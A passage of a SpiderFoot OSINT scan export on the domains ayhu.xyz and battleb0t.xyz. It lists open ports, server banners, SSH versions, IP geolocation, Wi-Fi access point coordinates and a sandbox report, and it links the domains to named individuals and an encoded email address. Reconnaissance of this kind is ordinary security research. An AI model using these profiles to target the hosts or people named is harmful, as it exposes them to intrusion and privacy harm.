<form id="challenge-form" action="/?__cf_chl_f_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="[encoded challenge token omitted]">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '64193',
cRay: '7c5f60726fad1912',
cHash: '710742417ab72e7',
cUPMDTk: "\/?__cf_chl_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
t: 'MTY4Mzg2MDA2My4xMDMwMDA=',
m: 'Eo2K0b1/t+yBaonJiJkwi8mL0OupY28MY+kXkSexuGA=',
i1: 'WdeoMAtxqx1knlB7AiLouA==',
i2: 'PLvf+P/FOv6sb4wuUck9Eg==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60726fad1912');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60726fad1912';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Flipboard (Category: tech) https://flipboard.com/@ayhu | ayhu |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:64:DA:1A) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:32:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.20:443 | 188.114.97.0/24 |
| 2023-05-12 03:00:57 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.94): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:53:45 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: C1F8:9B05:D303FE:F3CF12:645CF509
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-gig2250041-GIG
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683813642.858818,VS0,VE273
Vary: Accept-Encoding
X-Fastly-Request-ID: df03515606cb10d86a4e0fd793a1bc65b6eaa2df
| 2606:50c0:8002::153 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Boingo Colubris (Net ID: 00:02:2D:0B:A5:B3) | 34.0544, -118.244 |
| 2023-05-12 02:53:20 | IP Address | No | Mnemonic PassiveDNS | 25 | 0 | 2 | 0 | None | 46.101.229.70 | kekw.battleb0t.xyz |
| 2023-05-12 03:11:19 | Physical Coordinates | No | AbstractAPI | 100 | 0 | 2 | 0 | None | 40.2024, 29.0398 | 87.248.157.102 |
| 2023-05-12 03:16:24 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | Amsterdam, North Holland, NH, Netherlands, NL | 188.114.97.1 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | logitec-a53131 (Net ID: 00:01:8E:A5:31:30) | 37.7813933,-122.3918002 |
| 2023-05-12 02:54:00 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5e4de1db49291f-ORD
Content-Encoding: gzip
| 104.21.6.166 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:0C:41:D2:4D:0D) | 39.0469, -77.4903 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Revolut (Category: finance) https://revolut.me/login | login |
| 2023-05-12 02:53:52 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 80B6:49F3:235A56C:358722C:645CDF0C
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-kigq8000067-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683808012.126331,VS0,VE23
Vary: Accept-Encoding
X-Fastly-Request-ID: 68f03409faf68cb6eb3782ac00da0088b30b8906
| 2606:50c0:8003::153 |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | OpenBSD OpenSSH 7.4 | 87.248.157.102 |
| 2023-05-12 03:09:28 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | CN=acilacikveteriner.com | 87.248.157.102 |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.159): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:10:35 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.108.153:443 | 185.199.108.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | CableWiFi (Net ID: 00:0D:67:47:D4:F4) | 32.8608, -79.9746 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MobileInternet (Net ID: 00:02:B3:AE:E4:40) | 50.1188, 8.6843 |
| 2023-05-12 02:55:00 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [raw Hybrid Analysis sandbox report omitted] | 185.199.109.153 |
| 2023-05-12 02:44:03 | Internet Name | No | SpiderFoot UI | 73 | 0 | 0 | 0 | None | ayhu.xyz | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.190): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:03 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5ad981cbd3140a-ORD
Content-Encoding: gzip
| 172.67.135.9 |
| 2023-05-12 03:08:49 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.109 | 35.229.48.116 |
| 2023-05-12 02:47:30 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:88:80:c3:9c:e1:f5:05:d4:ce:eb:a7:b8:8b:96:69:16:e7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 13:22:33 2023 GMT
Not After : Jun 25 13:22:32 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus: [hex omitted]
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
EE:9A:7C:45:9F:8D:28:F8:82:DE:AE:58:A9:48:6F:F4:DA:ED:01:D8
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Mar 27 14:22:33.221 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:4F:44:FF:23:78:0C:0A:43:E7:DD:21:00:
C4:D1:3F:C3:F1:0D:AC:F3:42:E5:53:7F:E9:12:DC:C9:
41:E7:31:AA:02:20:29:7B:10:84:21:42:A6:BE:66:D5:
B5:62:0E:26:B3:36:1B:B2:1F:F3:F6:F2:FA:99:68:0E:
07:72:EE:35:ED:D1
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 27 14:22:33.315 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:42:E7:DB:8E:AD:39:D9:72:0F:22:03:49:
17:50:EA:AF:42:B9:A0:A7:C7:8A:2E:5E:9D:4B:70:15:
12:36:C9:8C:02:20:70:3E:22:0D:CB:C1:8E:23:7B:D4:
20:A7:55:2C:92:70:7B:00:76:E5:77:1A:32:2B:D4:BB:
A7:E5:BA:F4:CD:50
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 02:55:15 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | OpenBSD OpenSSH 8.9p1 | 165.232.113.85 |
| 2023-05-12 03:00:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.54): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | S-lan (Net ID: 00:01:24:F1:91:41) | 37.7813933,-122.3918002 |
| 2023-05-12 02:47:44 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 34.148.97.127:80 | 34.148.97.127 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | cozyhome (Net ID: 00:06:25:B4:2A:03) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:03:2F:04:BB:BC) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:10:33 | Blacklisted IP Address | Yes | Threat Jammer | 0 | 1 | 3 | 0 | None | Threat Jammer - Risk score: 50 (MEDIUM)
https://threatjammer.com/info/46.101.229.70 | 46.101.229.70 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Microsoft subsidiaries | battleb0t.github.io |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | dvdbeyond (Net ID: 00:01:24:F2:B3:12) | 37.7813933,-122.3918002 |
| 2023-05-12 02:49:20 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://eur02.safelinks.protection.outlook.com/?url=https%3A%2F%2Fotmanmarzouki.github.io%2FOtmans-Portfolio.github.io%2F&data=05%7C01%7Cmthiele%40merentis.com%7C299f2bd8deee47ffe3d608db19275c5b%7Ccf9329a22e9a41bebe5cca40f384186d%7C0%7C1%7C638131429069465359%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000%7C%7C%7C&sdata=pgeJVhV%2BRZasovsRpk6OiFgUM9uQNEWW2WY87NVwEIw%3D&reserved=0', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2852"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b24_IE_EarlyTabStart_0xd98_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b24_ConnHashTable<2852>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b24_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b24_IESQMMUTEX_0_331"\n 
"\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_b24_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.47.11.28:443"\n "185.199.110.153:443"\n "142.251.32.42:443"\n "172.217.12.99:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"eur02.safelinks.protection.outlook.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2015 Twitter, Inc." 
(Indicator: "twitter")\n ".icon-paypal:before {" (Indicator: "paypal")\n ".icon-social-twitter-circular:before {" (Indicator: "twitter")\n ".icon-social-twitter:before {" (Indicator: "twitter")\n ".icon-twitter2:before {" (Indicator: "twitter")\n ".icon-youtube2:before {" (Indicator: "youtube")\n ".icon-youtube:before {" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "MPBOXG78.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\MPBOXG78.txt]- [targetUID: 00000000-00002852]\n "RecoveryStore._243EC491-BE5E-11ED-ADB6-080027BE1525_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "main_1_.js" has type "ASCII text"- [targetUID: N/A]\n "otmanmarzouki.github_1_.xml" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "V45LK95K.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\V45LK95K.txt]- [targetUID: 00000000-00002852]\n "IIHN9FBJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IIHN9FBJ.txt]- [targetUID: 00000000-00002852]\n "icomoon_1_.css" has type "ASCII text"- [targetUID: N/A]\n "Otmans-Portfolio.github_1_.htm" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n 
"~DF82FC8B03F5CB359A.TMP" has type "data"- Location: [%TEMP%\\~DF82FC8B03F5CB359A.TMP]- [targetUID: 00000000-00002852]\n "6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkBgv58a-xA_1_.woff" has type "Web Open Font Format TrueType length 16440 version 1.1"- [targetUID: N/A]\n "~DF0C1A02793FB6D845.TMP" has type "data"- Location: [%TEMP%\\~DF0C1A02793FB6D845.TMP]- [targetUID: 00000000-00002852]\n "animate_1_.css" has type "ASCII text"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "css_2_.css" has type "ASCII text"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "OTIZE8VE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OTIZE8VE.txt]- [targetUID: 00000000-00002852]\n "jquery.easing.1.3_1_.js" has type "UTF-8 Unicode text"- [targetUID: N/A]\n "~DFC4D5F15611D45BBD.TMP" has type "data"- Location: [%TEMP%\\~DFC4D5F15611D45BBD.TMP]- [targetUID: 00000000-00002852]\n "nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKdFvXDXbtU_1_.woff" has type "Web Open Font Format TrueType length 23764 version 1.1"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.iec.chIEC"\n Pattern match: "http://getbootstrap.com"\n Pattern match: "http://modernizr.com/download/#-fontface-backgroundsize-borderimage-borderradius-boxshadow-flexbox-hsla-multiplebgs-opacity-rgba-textshadow-cssanimations-csscolumns-generatedcontent-cssgradients-cssreflections-csstransforms-csstransforms3d-csstransitions-a"\n Pattern match: "http://gsgd.co.uk/sandbox/jquery/easing/"\n Pattern match: 
"https://github.com/twbs/bootstrap/blob/master/LICENSE"\n Pattern match: "https://github.com/nickpettit/glide"\n Pattern match: "https://github.com/imakewebthings/waypoints/blog/master/licenses.txt*/!function(){use"\n Pattern match: "jquery.org/license"\n Pattern match: "github.com/necolas/normalize.css"\n Pattern match: "https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css"\n Pattern match: "http://www.w3.org/2000/svg},s={},t={},u={},v=[],w=v.slice,x,y=function(a,c,d,e){var"\n Pattern match: "https://fonts.googleapis.com/css?family=Quicksand:300,400,500,700"\n Pattern match: "https://github.com/Otmanmarzouki/ReactNativeAPP"\n Pattern match: "https://fonts.googleapis.com/css?family=Playfair+Display:400,400i,700"\n Pattern match: "http://daneden.me/animateLicensed"\n Pattern match: "https://fonts.gstatic.com/s/playfairdisplay/v30/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_qiTXtHA_w.woff"\n Pattern match: "https://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkKEo58a-xA.woff"\n Pattern match: "MUID14C9D52949456EC70EC6C7E648096F31msn.com/10258419353603109809065333609631019627*"\n Pattern match: "http://daneden.me/animate"\n Heuristic match: "eur02.safelinks.protection.outlook.com"\n Pattern match: "https://otmanmarzouki.github.io/Otmans-Portfolio.github.io/Accept-Language"\n Heuristic match: "GET /Otmans-Portfolio.github.io/ HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateDNT: 1Connection: Keep-AliveHost: otmanmarzou"\n Pattern match: "Otmans-Portfolio.github.io/css/animate.css"\n Pattern match: "Otmans-Portfolio.github.io/css/bootstrap.css"\n Pattern match: "Otmans-Portfolio.github.io/css/fonts/icomoon.eot?6py85u"\n Pattern match: "Otmans-Portfolio.github.io/css/fonts/icomoon.ttf?6py85u"\n Pattern match: "Otmans-Portfolio.github.io/css/fonts/icomoon.woff?6py85u"\n Pattern match: 
"Otmans-Portfolio.github.io/css/icomoon.css"\n Pattern match: "Otmans-Portfolio.github.io/css/style.css"\n Pattern match: "Otmans-Portfolio.github.io/fonts/flaticon/font/flaticon.css"\n Pattern match: "Otmans-Portfolio.github.io/fonts/icomoon/icomoon.eot?srf3rx"\n Pattern match: "Otmans-Portfolio.github.io/images/AppMobile.jpg"\n Pattern match: "Otmans-Portfolio.github.io/images/otman.jpg"\n Pattern match: "Otmans-Portfolio.github.io/js/bootstrap.min.js"\n Pattern match: "Otmans-Portfolio.github.io/js/jquery.countTo.js"\n Pattern match: "Otmans-Portfolio.github.io/js/jquery.easing.1.3.js"\n Pattern match: "Otmans-Portfolio.github.io/js/jquery.min.js"\n Pattern match: "Otmans-Portfolio.github.io/js/jquery.waypoints.min.js"\n Pattern match: "Otmans-Portfolio.github.io/js/main.js"\n Pattern match: "Otmans-Portfolio.github.io/js/modernizr-2.6.2.min.js"\n Pattern match: "https://csp.withgoogle.com/csp/apps-theme | 185.199.110.153 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1#########123x&&56########12X4& (Net ID: 00:02:2D:BC:46:55) | 34.0544, -118.244 |
| 2023-05-12 02:54:23 | Web Content | No | Web Spider | 3 | 0 | 5 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60726fad1912')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="kO2xNaAYVVwzudN_grHGsSAbBGIYi5Rp9eWkwq8bobk-1683860063-0-AQEme0OuFvC27LD-nLe2jrmTTnxOgSGtlJ79kOqNI8O_bMBUHsCUifsyrQtE2Qw_5-G3wZLVyXKSq4HyXvLjyCiAdaCGs4Ok-COq8gyypPok4HyuqEcnabkOPj9JKzn7fzxQf8pA4avsXNbgzL5RFZ0OappR_ENyOliTj3y1usOCEfdx0Qw-4NtIYkgBrlm6HYt1w2WiYgJIzvrwK3xMFits_Ebjt14epXfZCroTuFIFxaYyyRcuJJEK3ck04c2JtRdR99xcpwbep8NMi6CNOGP-aAH4FLQSKV1p7HK0fEmUDFvoadw-7bo2EucRyXYFLEbjS7Z_OKl0Srfy1Vim3Z_jqewduFNgcp1B-ir-aT25S4z2lvk1aBpRpS3Fpn4bKR_T7uQSek6SD4z_I81JUPCm-TbJt2WcAviPmmrfZDtigYqwaDeqh4Pqa29XowW1l1nnKs6qCFhQeaLuigzJf9PhtuPk6Ts6nn4TNWVyl9ze9NMDXt3HC-u5rh_1KxQxsTY_4JhB1jT5PYZQMJUvzkddK2MPm_CtJJRmvzu4A8h1xyRkeTxVWjg5p76zqZFKP8HOoZP1u7GkAK20kE8vR-O-Gy6CmmKj5hSdpF5vjt71wmiC0vDCk1rDRhhcEkt92S6uijW7cxkpckY78siJqFhpHOVFodJroZuf7HFMwvosFXQ5NGYyHEQXXlmkoclMMK3rVJNdxiIstjCLFnDxNsbd1epvptoA5TGFKFTmHs6QjRzTIv_BIuw1QORH1eUHK9O9N-txmFD1IbLACf92gVKiwNsAAtrRtW2F06n6d9Vs_GXVIbPcV6cwsJdIquww9NaI78ELNHJNq1J_tTdFxBZavYogbVnqkQFRmkO2l5VXSM6E9dcoOwi5q4qHSrZmlxJHiqDY-PKE8PDBSk8akurNHoBfBjtw2_a1RfC_lu8B7yXfZ1SNiql9epxt9-xA01ZEs-JXEIWKB7DVUehYb7RiTKZ_trIoGgh7Q6yEfeLCDTtC1yC2iiOVhPkX_h4Qfaf7LfPKruh9cjrbe0r7qMb0h8bIRy1fsQXVXXjhWHUJzLPbbOWh7F_0GW3qFusmjdR_P6sJL-gXtd5koZkzn6EK_YdKJO6jY9uPxr4sRnkK0ioS_0VfK7kQax3cDEA5YcxYvkmmBl4DMVhT7ISnmS5G8dSMhHOdJpbJMK5G9qQm8E9Nux-WgwCPgj6TkAmQMz1NenXnJJdqz-irhHABa_tynmZ1IPtBtnIPWbu4Mgp5VyNXvvUpfdGX7V6s-SjMtH9NRG3i4YZDcDp72B0EVaiT4n2jNeEilDlbVLw8k42_nwTD7Pw7hKXZpTyQQZntWW5wgIly7x0dOOWeJl6TsZIiDLpQjNv-mLX_xQzZHdw5kii58Ccy2XJ4npuVEuBraZJ9n6B2-5AwWyV3Qr3DTuk5PmfcIxKTr_u7HsbpdFR4FKp9wurJ9rvdDIpbL_yKOtyqM9yLjxeOpIdNG7zFw8AT7XqbUfz26ewFlzRX_Cc5FOV6ATYROS3OVpko2KV-NVpYQTJgT